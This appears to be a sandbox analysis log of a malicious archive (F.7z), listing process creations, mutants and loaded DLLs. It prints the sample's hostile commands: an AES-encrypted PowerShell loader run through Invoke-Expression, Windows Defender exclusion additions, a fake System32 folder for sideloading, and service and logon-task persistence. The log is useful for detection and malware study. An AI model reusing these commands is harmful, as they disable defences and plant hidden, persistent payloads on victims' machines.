Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
Source: C:\Program Files\7-Zip\7zFM.exe File created: C:\Users\user\AppData\Local\Temp\7zE4809A201
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: F.7z ReversingLabs: Detection: 27%
Source: F.7z Virustotal: Detection: 31%
Source: svchost.exe String found in binary or memory: -start
Source: svchost.exe String found in binary or memory: -addr
Source: svchost.exe String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive"
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usosvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: updatepolicy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usocoreps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usoapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files\7-Zip\7zFM.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
